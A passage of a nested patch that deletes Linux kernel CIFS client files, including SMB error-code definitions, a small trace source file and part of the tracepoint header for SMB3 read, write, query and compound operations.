+-		len = 0;
+-		*wpwd = 0; /* Ensure string is null terminated */
+-	}
+-
+-	rc = mdfour(p16, (unsigned char *) wpwd, len * sizeof(__le16));
+-	memzero_explicit(wpwd, sizeof(wpwd));
+-
+-	return rc;
+-}
+diff --git a/fs/cifs/smberr.h b/fs/cifs/smberr.h
+deleted file mode 100644
+index aeffdad829e2e..0000000000000
+--- a/fs/cifs/smberr.h
++++ /dev/null
+@@ -1,171 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2004
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- *   See Error Codes section of the SNIA CIFS Specification
+- *   for more information
+- *
+- */
+-
+-#define SUCCESS	0x00	/* The request was successful. */
+-#define ERRDOS	0x01	/* Error is from the core DOS operating system set */
+-#define ERRSRV	0x02	/* Error is generated by the file server daemon */
+-#define ERRHRD	0x03	/* Error is a hardware error. */
+-#define ERRCMD	0xFF	/* Command was not in the "SMB" format. */
+-
+-/* The following error codes may be generated with the SUCCESS error class.*/
+-
+-/*#define SUCCESS	0	The request was successful. */
+-
+-/* The following error codes may be generated with the ERRDOS error class.*/
+-
+-#define ERRbadfunc		1	/* Invalid function. The server did not
+-					   recognize or could not perform a
+-					   system call generated by the server,
+-					   e.g., set the DIRECTORY attribute on
+-					   a data file, invalid seek mode. */
+-#define ERRbadfile		2	/* File not found. The last component
+-					   of a file's pathname could not be
+-					   found. */
+-#define ERRbadpath		3	/* Directory invalid. A directory
+-					   component in a pathname could not be
+-					   found. */
+-#define ERRnofids		4	/* Too many open files. The server has
+-					   no file handles available. */
+-#define ERRnoaccess		5	/* Access denied, the client's context
+-					   does not permit the requested
+-					   function. This includes the
+-					   following conditions: invalid rename
+-					   command, write to Fid open for read
+-					   only, read on Fid open for write
+-					   only, attempt to delete a non-empty
+-					   directory */
+-#define ERRbadfid		6	/* Invalid file handle. The file handle
+-					   specified was not recognized by the
+-					   server. */
+-#define ERRbadmcb		7	/* Memory control blocks destroyed. */
+-#define ERRnomem		8	/* Insufficient server memory to
+-					   perform the requested function. */
+-#define ERRbadmem		9	/* Invalid memory block address. */
+-#define ERRbadenv		10	/* Invalid environment. */
+-#define ERRbadformat		11	/* Invalid format. */
+-#define ERRbadaccess		12	/* Invalid open mode. */
+-#define ERRbaddata		13	/* Invalid data (generated only by
+-					   IOCTL calls within the server). */
+-#define ERRbaddrive		15	/* Invalid drive specified. */
+-#define ERRremcd		16	/* A Delete Directory request attempted
+-					   to remove the server's current
+-					   directory. */
+-#define ERRdiffdevice		17	/* Not same device (e.g., a cross
+-					   volume rename was attempted */
+-#define ERRnofiles		18	/* A File Search command can find no
+-					   more files matching the specified
+-					   criteria. */
+-#define ERRwriteprot		19	/* media is write protected */
+-#define ERRgeneral		31
+-#define ERRbadshare		32	/* The sharing mode specified for an
+-					   Open conflicts with existing FIDs on
+-					   the file. */
+-#define ERRlock			33	/* A Lock request conflicted with an
+-					   existing lock or specified an
+-					   invalid mode, or an Unlock requested
+-					   attempted to remove a lock held by
+-					   another process. */
+-#define ERRunsup		50
+-#define ERRnosuchshare		67
+-#define ERRfilexists		80	/* The file named in the request
+-					   already exists. */
+-#define ERRinvparm		87
+-#define ERRdiskfull		112
+-#define ERRinvname		123
+-#define ERRinvlevel		124
+-#define ERRdirnotempty		145
+-#define ERRnotlocked		158
+-#define ERRcancelviolation	173
+-#define ERRalreadyexists	183
+-#define ERRbadpipe		230
+-#define ERRpipebusy		231
+-#define ERRpipeclosing		232
+-#define ERRnotconnected		233
+-#define ERRmoredata		234
+-#define ERReasnotsupported	282
+-#define ErrQuota		0x200	/* The operation would cause a quota
+-					   limit to be exceeded. */
+-#define ErrNotALink		0x201	/* A link operation was performed on a
+-					   pathname that was not a link. */
+-
+-/* Below errors are used internally (do not come over the wire) for passthrough
+-   from STATUS codes to POSIX only  */
+-#define ERRsymlink              0xFFFD
+-#define ErrTooManyLinks         0xFFFE
+-
+-/* Following error codes may be generated with the ERRSRV error class.*/
+-
+-#define ERRerror		1	/* Non-specific error code. It is
+-					   returned under the following
+-					   conditions: resource other than disk
+-					   space exhausted (e.g. TIDs), first
+-					   SMB command was not negotiate,
+-					   multiple negotiates attempted, and
+-					   internal server error. */
+-#define ERRbadpw		2	/* Bad password - name/password pair in
+-					   a TreeConnect or Session Setup are
+-					   invalid. */
+-#define ERRbadtype		3	/* used for indicating DFS referral
+-					   needed */
+-#define ERRaccess		4	/* The client does not have the
+-					   necessary access rights within the
+-					   specified context for requested
+-					   function. */
+-#define ERRinvtid		5	/* The Tid specified in a command was
+-					   invalid. */
+-#define ERRinvnetname		6	/* Invalid network name in tree
+-					   connect. */
+-#define ERRinvdevice		7	/* Invalid device - printer request
+-					   made to non-printer connection or
+-					   non-printer request made to printer
+-					   connection. */
+-#define ERRqfull		49	/* Print queue full (files) -- returned
+-					   by open print file. */
+-#define ERRqtoobig		50	/* Print queue full -- no space. */
+-#define ERRqeof			51	/* EOF on print queue dump */
+-#define ERRinvpfid		52	/* Invalid print file FID. */
+-#define ERRsmbcmd		64	/* The server did not recognize the
+-					   command received. */
+-#define ERRsrverror		65	/* The server encountered an internal
+-					   error, e.g., system file
+-					   unavailable. */
+-#define ERRbadBID		66	/* (obsolete) */
+-#define ERRfilespecs		67	/* The Fid and pathname parameters
+-					   contained an invalid combination of
+-					   values. */
+-#define ERRbadLink		68	/* (obsolete) */
+-#define ERRbadpermits		69	/* The access permissions specified for
+-					   a file or directory are not a valid
+-					   combination. */
+-#define ERRbadPID		70
+-#define ERRsetattrmode		71	/* attribute (mode) is invalid */
+-#define ERRpaused		81	/* Server is paused */
+-#define ERRmsgoff		82	/* reserved - messaging off */
+-#define ERRnoroom		83	/* reserved - no room for message */
+-#define ERRrmuns		87	/* reserved - too many remote names */
+-#define ERRtimeout		88	/* operation timed out */
+-#define ERRnoresource		89	/* No resources available for request
+-					   */
+-#define ERRtoomanyuids		90	/* Too many UIDs active on this session
+-					   */
+-#define ERRbaduid		91	/* The UID is not known as a valid user
+-					   */
+-#define ERRusempx		250	/* temporarily unable to use raw */
+-#define ERRusestd		251	/* temporarily unable to use either raw
+-					   or mpx */
+-#define ERR_NOTIFY_ENUM_DIR	1024
+-#define ERRnoSuchUser		2238	/* user account does not exist */
+-#define ERRaccountexpired	2239
+-#define ERRbadclient		2240	/* can not logon from this client */
+-#define ERRbadLogonTime		2241	/* logon hours do not allow this */
+-#define ERRpasswordExpired	2242
+-#define ERRnetlogonNotStarted	2455
+-#define ERRnosupport		0xFFFF
+diff --git a/fs/cifs/trace.c b/fs/cifs/trace.c
+deleted file mode 100644
+index 4654837871934..0000000000000
+--- a/fs/cifs/trace.c
++++ /dev/null
+@@ -1,8 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- *   Copyright (C) 2018, Microsoft Corporation.
+- *
+- *   Author(s): Steve French <stfrench@microsoft.com>
+- */
+-#define CREATE_TRACE_POINTS
+-#include "trace.h"
+diff --git a/fs/cifs/trace.h b/fs/cifs/trace.h
+deleted file mode 100644
+index d3053bd8ae731..0000000000000
+--- a/fs/cifs/trace.h
++++ /dev/null
+@@ -1,1070 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- *   Copyright (C) 2018, Microsoft Corporation.
+- *
+- *   Author(s): Steve French <stfrench@microsoft.com>
+- */
+-#undef TRACE_SYSTEM
+-#define TRACE_SYSTEM cifs
+-
+-#if !defined(_CIFS_TRACE_H) || defined(TRACE_HEADER_MULTI_READ)
+-#define _CIFS_TRACE_H
+-
+-#include <linux/tracepoint.h>
+-#include <linux/net.h>
+-#include <linux/inet.h>
+-
+-/*
+- * Please use this 3-part article as a reference for writing new tracepoints:
+- * https://lwn.net/Articles/379903/
+- */
+-
+-/* For logging errors in read or write */
+-DECLARE_EVENT_CLASS(smb3_rw_err_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u64	offset,
+-		__u32	len,
+-		int	rc),
+-	TP_ARGS(xid, fid, tid, sesid, offset, len, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u64, offset)
+-		__field(__u32, len)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->offset = offset;
+-		__entry->len = len;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("\txid=%u sid=0x%llx tid=0x%x fid=0x%llx offset=0x%llx len=0x%x rc=%d",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->offset, __entry->len, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_RW_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_rw_err_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u64	offset,			\
+-		__u32	len,			\
+-		int	rc),			\
+-	TP_ARGS(xid, fid, tid, sesid, offset, len, rc))
+-
+-DEFINE_SMB3_RW_ERR_EVENT(write_err);
+-DEFINE_SMB3_RW_ERR_EVENT(read_err);
+-DEFINE_SMB3_RW_ERR_EVENT(query_dir_err);
+-DEFINE_SMB3_RW_ERR_EVENT(zero_err);
+-DEFINE_SMB3_RW_ERR_EVENT(falloc_err);
+-
+-
+-/* For logging successful read or write */
+-DECLARE_EVENT_CLASS(smb3_rw_done_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u64	offset,
+-		__u32	len),
+-	TP_ARGS(xid, fid, tid, sesid, offset, len),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u64, offset)
+-		__field(__u32, len)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->offset = offset;
+-		__entry->len = len;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx offset=0x%llx len=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->offset, __entry->len)
+-)
+-
+-#define DEFINE_SMB3_RW_DONE_EVENT(name)         \
+-DEFINE_EVENT(smb3_rw_done_class, smb3_##name,   \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u64	offset,			\
+-		__u32	len),			\
+-	TP_ARGS(xid, fid, tid, sesid, offset, len))
+-
+-DEFINE_SMB3_RW_DONE_EVENT(write_enter);
+-DEFINE_SMB3_RW_DONE_EVENT(read_enter);
+-DEFINE_SMB3_RW_DONE_EVENT(query_dir_enter);
+-DEFINE_SMB3_RW_DONE_EVENT(zero_enter);
+-DEFINE_SMB3_RW_DONE_EVENT(falloc_enter);
+-DEFINE_SMB3_RW_DONE_EVENT(write_done);
+-DEFINE_SMB3_RW_DONE_EVENT(read_done);
+-DEFINE_SMB3_RW_DONE_EVENT(query_dir_done);
+-DEFINE_SMB3_RW_DONE_EVENT(zero_done);
+-DEFINE_SMB3_RW_DONE_EVENT(falloc_done);
+-
+-/* For logging successful set EOF (truncate) */
+-DECLARE_EVENT_CLASS(smb3_eof_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u64	offset),
+-	TP_ARGS(xid, fid, tid, sesid, offset),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u64, offset)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->offset = offset;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx offset=0x%llx",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->offset)
+-)
+-
+-#define DEFINE_SMB3_EOF_EVENT(name)         \
+-DEFINE_EVENT(smb3_eof_class, smb3_##name,   \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u64	offset),		\
+-	TP_ARGS(xid, fid, tid, sesid, offset))
+-
+-DEFINE_SMB3_EOF_EVENT(set_eof);
+-
+-/*
+- * For handle based calls other than read and write, and get/set info
+- */
+-DECLARE_EVENT_CLASS(smb3_fd_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid),
+-	TP_ARGS(xid, fid, tid, sesid),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-	),
+-	TP_printk("\txid=%u sid=0x%llx tid=0x%x fid=0x%llx",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid)
+-)
+-
+-#define DEFINE_SMB3_FD_EVENT(name)          \
+-DEFINE_EVENT(smb3_fd_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid),			\
+-	TP_ARGS(xid, fid, tid, sesid))
+-
+-DEFINE_SMB3_FD_EVENT(flush_enter);
+-DEFINE_SMB3_FD_EVENT(flush_done);
+-DEFINE_SMB3_FD_EVENT(close_enter);
+-DEFINE_SMB3_FD_EVENT(close_done);
+-DEFINE_SMB3_FD_EVENT(oplock_not_found);
+-
+-DECLARE_EVENT_CLASS(smb3_fd_err_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		int	rc),
+-	TP_ARGS(xid, fid, tid, sesid, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("\txid=%u sid=0x%llx tid=0x%x fid=0x%llx rc=%d",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->rc)
+-)
+-
+-#define DEFINE_SMB3_FD_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_fd_err_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		int	rc),			\
+-	TP_ARGS(xid, fid, tid, sesid, rc))
+-
+-DEFINE_SMB3_FD_ERR_EVENT(flush_err);
+-DEFINE_SMB3_FD_ERR_EVENT(lock_err);
+-DEFINE_SMB3_FD_ERR_EVENT(close_err);
+-
+-/*
+- * For handle based query/set info calls
+- */
+-DECLARE_EVENT_CLASS(smb3_inf_enter_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u8	infclass,
+-		__u32	type),
+-	TP_ARGS(xid, fid, tid, sesid, infclass, type),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u8, infclass)
+-		__field(__u32, type)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->infclass = infclass;
+-		__entry->type = type;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx class=%u type=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->infclass, __entry->type)
+-)
+-
+-#define DEFINE_SMB3_INF_ENTER_EVENT(name)          \
+-DEFINE_EVENT(smb3_inf_enter_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u8	infclass,		\
+-		__u32	type),			\
+-	TP_ARGS(xid, fid, tid, sesid, infclass, type))
+-
+-DEFINE_SMB3_INF_ENTER_EVENT(query_info_enter);
+-DEFINE_SMB3_INF_ENTER_EVENT(query_info_done);
+-DEFINE_SMB3_INF_ENTER_EVENT(notify_enter);
+-DEFINE_SMB3_INF_ENTER_EVENT(notify_done);
+-
+-DECLARE_EVENT_CLASS(smb3_inf_err_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u8	infclass,
+-		__u32	type,
+-		int	rc),
+-	TP_ARGS(xid, fid, tid, sesid, infclass, type, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u8, infclass)
+-		__field(__u32, type)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->infclass = infclass;
+-		__entry->type = type;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx class=%u type=0x%x rc=%d",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->infclass, __entry->type, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_INF_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_inf_err_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u8	infclass,		\
+-		__u32	type,			\
+-		int	rc),			\
+-	TP_ARGS(xid, fid, tid, sesid, infclass, type, rc))
+-
+-DEFINE_SMB3_INF_ERR_EVENT(query_info_err);
+-DEFINE_SMB3_INF_ERR_EVENT(set_info_err);
+-DEFINE_SMB3_INF_ERR_EVENT(notify_err);
+-DEFINE_SMB3_INF_ERR_EVENT(fsctl_err);
+-
+-DECLARE_EVENT_CLASS(smb3_inf_compound_enter_class,
+-	TP_PROTO(unsigned int xid,
+-		__u32	tid,
+-		__u64	sesid,
+-		const char *full_path),
+-	TP_ARGS(xid, tid, sesid, full_path),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__string(path, full_path)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__assign_str(path, full_path);
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x path=%s",
+-		__entry->xid, __entry->sesid, __entry->tid,
+-		__get_str(path))
+-)
+-
+-#define DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(name)     \
+-DEFINE_EVENT(smb3_inf_compound_enter_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		const char *full_path),		\
+-	TP_ARGS(xid, tid, sesid, full_path))
+-
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(query_info_compound_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(posix_query_info_compound_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(hardlink_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(rename_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(rmdir_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(set_eof_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(set_info_compound_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(delete_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(mkdir_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(tdis_enter);
+-
+-
+-DECLARE_EVENT_CLASS(smb3_inf_compound_done_class,
+-	TP_PROTO(unsigned int xid,
+-		__u32	tid,
+-		__u64	sesid),
+-	TP_ARGS(xid, tid, sesid),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid)
+-)
+-
+-#define DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(name)     \
+-DEFINE_EVENT(smb3_inf_compound_done_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u32	tid,			\
+-		__u64	sesid),			\
+-	TP_ARGS(xid, tid, sesid))
+-
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(query_info_compound_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(posix_query_info_compound_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(hardlink_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(rename_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(rmdir_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(set_eof_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(set_info_compound_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(delete_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(mkdir_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(tdis_done);
+-
+-
+-DECLARE_EVENT_CLASS(smb3_inf_compound_err_class,
+-	TP_PROTO(unsigned int xid,
+-		__u32	tid,
+-		__u64	sesid,
+-		int	rc),
+-	TP_ARGS(xid, tid, sesid, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x rc=%d",
+-		__entry->xid, __entry->sesid, __entry->tid,
+-		__entry->rc)
+-)
+-
+-#define DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(name)     \
+-DEFINE_EVENT(smb3_inf_compound_err_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		int rc),			\
+-	TP_ARGS(xid, tid, sesid, rc))
+-
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(query_info_compound_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(posix_query_info_compound_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(hardlink_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(rename_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(rmdir_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(set_eof_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(set_info_compound_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(mkdir_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(delete_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(tdis_err);
+-
+-/*
+- * For logging SMB3 Status code and Command for responses which return errors
+- */
+-DECLARE_EVENT_CLASS(smb3_cmd_err_class,
+-	TP_PROTO(__u32	tid,
+-		__u64	sesid,
+-		__u16	cmd,
+-		__u64	mid,
+-		__u32	status,
+-		int	rc),
+-	TP_ARGS(tid, sesid, cmd, mid, status, rc),
+-	TP_STRUCT__entry(
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u16, cmd)
+-		__field(__u64, mid)
+-		__field(__u32, status)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->cmd = cmd;
+-		__entry->mid = mid;
+-		__entry->status = status;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("\tsid=0x%llx tid=0x%x cmd=%u mid=%llu status=0x%x rc=%d",
+-		__entry->sesid, __entry->tid, __entry->cmd, __entry->mid,
+-		__entry->status, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_CMD_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_cmd_err_class, smb3_##name,    \
+-	TP_PROTO(__u32	tid,			\
+-		__u64	sesid,			\
+-		__u16	cmd,			\
+-		__u64	mid,			\
+-		__u32	status,			\
+-		int	rc),			\
+-	TP_ARGS(tid, sesid, cmd, mid, status, rc))
+-
+-DEFINE_SMB3_CMD_ERR_EVENT(cmd_err);
+-
+-DECLARE_EVENT_CLASS(smb3_cmd_done_class,
+-	TP_PROTO(__u32	tid,
+-		__u64	sesid,
+-		__u16	cmd,
+-		__u64	mid),
+-	TP_ARGS(tid, sesid, cmd, mid),
+-	TP_STRUCT__entry(
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u16, cmd)
+-		__field(__u64, mid)
+-	),
+-	TP_fast_assign(
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->cmd = cmd;
+-		__entry->mid = mid;
+-	),
+-	TP_printk("\tsid=0x%llx tid=0x%x cmd=%u mid=%llu",
+-		__entry->sesid, __entry->tid,
+-		__entry->cmd, __entry->mid)
+-)
+-
+-#define DEFINE_SMB3_CMD_DONE_EVENT(name)          \
+-DEFINE_EVENT(smb3_cmd_done_class, smb3_##name,    \
+-	TP_PROTO(__u32	tid,			\
+-		__u64	sesid,			\
+-		__u16	cmd,			\
+-		__u64	mid),			\
+-	TP_ARGS(tid, sesid, cmd, mid))
+-
+-DEFINE_SMB3_CMD_DONE_EVENT(cmd_enter);
+-DEFINE_SMB3_CMD_DONE_EVENT(cmd_done);
+-DEFINE_SMB3_CMD_DONE_EVENT(ses_expired);
+-
+-DECLARE_EVENT_CLASS(smb3_mid_class,
+-	TP_PROTO(__u16	cmd,
+-		__u64	mid,
+-		__u32	pid,
+-		unsigned long when_sent,
+-		unsigned long when_received),
+-	TP_ARGS(cmd, mid, pid, when_sent, when_received),
+-	TP_STRUCT__entry(
+-		__field(__u16, cmd)
+-		__field(__u64, mid)
+-		__field(__u32, pid)
+-		__field(unsigned long, when_sent)
+-		__field(unsigned long, when_received)
+-	),
+-	TP_fast_assign(
+-		__entry->cmd = cmd;
+-		__entry->mid = mid;
+-		__entry->pid = pid;
+-		__entry->when_sent = when_sent;
+-		__entry->when_received = when_received;
+-	),
+-	TP_printk("\tcmd=%u mid=%llu pid=%u, when_sent=%lu when_rcv=%lu",
+-		__entry->cmd, __entry->mid, __entry->pid, __entry->when_sent,
+-		__entry->when_received)
+-)
+-
+-#define DEFINE_SMB3_MID_EVENT(name)          \
+-DEFINE_EVENT(smb3_mid_class, smb3_##name,    \
+-	TP_PROTO(__u16	cmd,			\
+-		__u64	mid,			\
+-		__u32	pid,			\
+-		unsigned long when_sent,	\
+-		unsigned long when_received),	\
+-	TP_ARGS(cmd, mid, pid, when_sent, when_received))
+-
+-DEFINE_SMB3_MID_EVENT(slow_rsp);
+-
+-DECLARE_EVENT_CLASS(smb3_exit_err_class,
+-	TP_PROTO(unsigned int xid,
+-		const char *func_name,
+-		int	rc),
+-	TP_ARGS(xid, func_name, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__string(func_name, func_name)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__assign_str(func_name, func_name);
+-		__entry->rc = rc;
+-	),
+-	TP_printk("\t%s: xid=%u rc=%d",
+-		__get_str(func_name), __entry->xid, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_EXIT_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_exit_err_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		const char *func_name,		\
+-		int	rc),			\
+-	TP_ARGS(xid, func_name, rc))
+-
+-DEFINE_SMB3_EXIT_ERR_EVENT(exit_err);
+-
+-
+-DECLARE_EVENT_CLASS(smb3_sync_err_class,
+-	TP_PROTO(unsigned long ino,
+-		int	rc),
+-	TP_ARGS(ino, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned long, ino)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->ino = ino;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("\tino=%lu rc=%d",
+-		__entry->ino, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_SYNC_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_sync_err_class, cifs_##name,    \
+-	TP_PROTO(unsigned long ino,		\
+-		int	rc),			\
+-	TP_ARGS(ino, rc))
+-
+-DEFINE_SMB3_SYNC_ERR_EVENT(fsync_err);
+-DEFINE_SMB3_SYNC_ERR_EVENT(flush_err);
+-
+-
+-DECLARE_EVENT_CLASS(smb3_enter_exit_class,
+-	TP_PROTO(unsigned int xid,
